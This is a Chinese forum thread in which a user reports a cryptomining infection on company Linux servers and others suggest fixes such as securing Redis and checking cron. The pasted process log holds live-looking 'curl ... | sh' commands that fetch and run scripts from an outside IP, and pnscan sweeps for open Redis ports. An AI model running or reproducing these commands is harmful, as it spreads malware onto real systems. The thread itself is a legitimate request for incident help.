当前位置:网站模板库 > web学院 > 案例分享 > 兄弟们,公司内网好像中病毒了,怎么解决啊,求助求助啊
admin 案例分享

兄弟们,公司内网好像中病毒了,怎么解决啊,求助求助啊

兄弟们,公司内网好像中病毒了,怎么解决啊,求助求助啊,第1张

兄弟们,公司内网好像中病毒了,怎么解决啊,求助求助啊,第2张

root 2147 2838 1 14:42 ? 00:00:00 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 172.108.0.0/16 6379 root 2379 1 0 12:45 ? 00:00:00 /bin/sh -c curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh root 2381 2379 0 12:45 ? 00:00:00 sh root 2409 1 0 12:45 ? 00:00:00 systemd
root 2650 2381 0 12:45 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash root 2652 2650 0 12:45 ? 00:00:00 bash root 2836 2652 0 12:46 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/rsh.sh|sh root 2838 2836 0 12:46 ? 00:00:00 sh root 3180 1893 0 14:42 pts/0 00:00:00 ps -ef root 11431 24106 0 13:43 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/rsh.sh|sh root 11433 11431 0 13:43 ? 00:00:00 sh root 17489 1 0 13:15 ? 00:00:00 /bin/sh -c curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh root 17491 17489 0 13:15 ? 00:00:00 sh root 19785 17491 0 13:15 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash root 19787 19785 0 13:15 ? 00:00:00 bash root 24104 31056 0 13:40 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash root 24106 24104 0 13:40 ? 00:00:00 bash root 29590 1 0 13:00 ? 00:00:00 /bin/sh -c curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh root 29592 29590 0 13:00 ? 00:00:00 sh root 29836 29592 0 13:00 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash root 29838 29836 0 13:00 ? 00:00:00 bash root 30220 19787 0 13:18 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/rsh.sh|sh root 30222 30220 0 13:18 ? 00:00:00 sh root 31054 1 0 13:30 ? 00:00:00 /bin/sh -c curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh root 31056 31054 0 13:30 ? 00:00:00 sh root 31492 632 2 14:42 ? 00:00:00 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 137.152.0.0/16 6379 root 32517 30222 2 14:42 ? 00:00:00 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 100.47.0.0/16 6379

root 2650 2381 0 12:45 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash 这个命令开机就开始跑 还他妈卸载我的 proc 文件系统,软件都跑不起了,怎么找到他在哪里啊 ,妈的我快气死了

----------------------- 以下是精选回复-----------------------

答:哈哈,挖矿病毒
答:是不是有很多 cron 进程,关掉了还会重启?你看看 redis 是不是开放了外网端口,没设密码?关掉试试
答:断网 先把 wget curl 卸载 再慢慢找
上次看到一个帖子 www 账号下去看 cron
答:我公司的内部服务器也中过挖矿,
同事说定时任务没跑,直接去找定时任务的日志,看到一个莫名奇妙的定时任务在跑.还老报错,
看了下文件,复制代码上网上搜了一下,挖矿的,清理了一圈,
原因就是 redis 没有设置密码,
以前都没有映射外网端口所以一直没事,后面因为一个项目要测试,开了一下,中招了
答:这恶意脚本还是托管在阿里云的,不去举报投诉一下?
答:论 redis 设置密码的重要性
答:1 随着 linux 被挂马,被挖矿,被勒索增多。快过年之前,广大 it 安全督察人员(信息部锦衣卫)行动起来了,我很欣慰。
2 还有人讨厌 win 每月更新补丁么?
3 还在开门后一走了之?无门卫?
答:hosts 里把目标 ip 重定向到 127.0.0.1

DABAN RP主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
网站模板库 » 兄弟们,公司内网好像中病毒了,怎么解决啊,求助求助啊

admin 钻石

分享到:

相关推荐

0条评论

发表评论

提供最优质的资源集合

立即查看 了解详情